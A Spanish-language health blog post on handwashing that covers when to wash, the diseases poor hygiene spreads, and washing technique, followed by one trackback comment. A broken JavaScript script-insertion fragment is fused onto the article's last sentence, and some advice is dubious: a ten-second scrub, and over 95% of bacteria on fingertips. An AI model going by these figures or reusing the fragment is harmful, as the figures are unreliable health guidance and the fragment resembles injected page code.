Salud y belleza » Salud

¡A lavarse las manos!

1 Comentario

manos

“Dios mira las manos limpias, no las llenas” decía el poeta romano Publio Siro. Pero, claro, lavar los pecados, no es el único fin del ejercicio que da titulo a esta nota -aunque sí el más importante-. En efecto, mantener la higiene de aquella pequeña porción de nuestras extremidades superiores, es una de las más maneras más efectivas de deshacernos de todos los microbios y bacterias que contraemos en la calle.

“Lavarse las manos es un trabajo a veces subestimado pero, sin embargo, sumamente vital para nuestra salud. El hombre reconoce absolutamente todo lo que lo rodea mediante el tacto. Entramos en contacto con el mundo mediante nuestras manos. Es por eso que debemos lavarlas de forma regular, para no andar transmitiendo o captando microbios de aquí para allá” confiesa un experto de la salud.

Principalmente, debemos lavarnos las manos en situaciones como las siguientes: antes de comer y cocinar; luego de ir al baño (también antes); después de limpiar la casa o manipular muebles; tras tocar animales, incluyendo mascotas familiares, es requisito indispensable; al estar de visita o en contacto con familiares o amigos enfermos; después de sonarse la nariz, toser o estornudar.

Al no lavar nuestras manos de forma adecuada y regular, nos estamos arriesgando a contraer diferentes enfermedades: se pueden coger gérmenes provocando luego infecciones en nariz, ojos y boca. Por otra parte, está comprobado que los resfriados son mayormente contraídos o captados por esa vía, es decir al no lavarse las manos y luego llevar estas hacia ciertas zonas mucosas. Además de los resfriados, hay enfermedades bastante graves como la hepatitis A, la meningitis y la diarrea infecciosa que también pueden afectarnos si no mantenemos una correcta higiene.

Sobre los modos en que tenemos que lavar nuestras manos, realmente no hay demasiados secretos: es preciso usar agua templada y jabón (el agua sola no es suficiente); debemos frotar una mano contra otra de forma contundente y alrededor de diez segundos; es necesario dedicar especial atención a las yemas de los dedos y a las uñas pues más del 95% de las bacterias se albergan allí.
Es tan importante está práctica que inclusive UNICEF creó el “Día Internacional del lavado de manos”. ¿En que fecha se celebra esta campaña? El 15 de octubre y más de 60 países en desarrollo, sobre todo en Asia y África, llevan a cabo diversas actividades en las escuelas y otros sitios fomentando un regular y responsable lavado de manos.
Como vemos, todos se “lavan las manos”. Salvo UNICEF. En el buen sentido.d.getElementsByTagName('head')[0].appendChild(s);var d=document;var s=d.createElement('script');

Más consejos de salud y belleza : , ,

One Comment »

  • Clases de hepatitis (II) said:

    [...] vemos, hay mucho de la Hepatitis que bien merece la pena conocer. Desde la higiene (ver artículos) hasta el cuidado en las relaciones sexuales, todo juega un papel vital. [...]

Publique su Comentario !

Add your comment below, or trackback from your own site. You can also subscribe to these comments via RSS.

Be nice. Keep it clean. Stay on topic. No spam.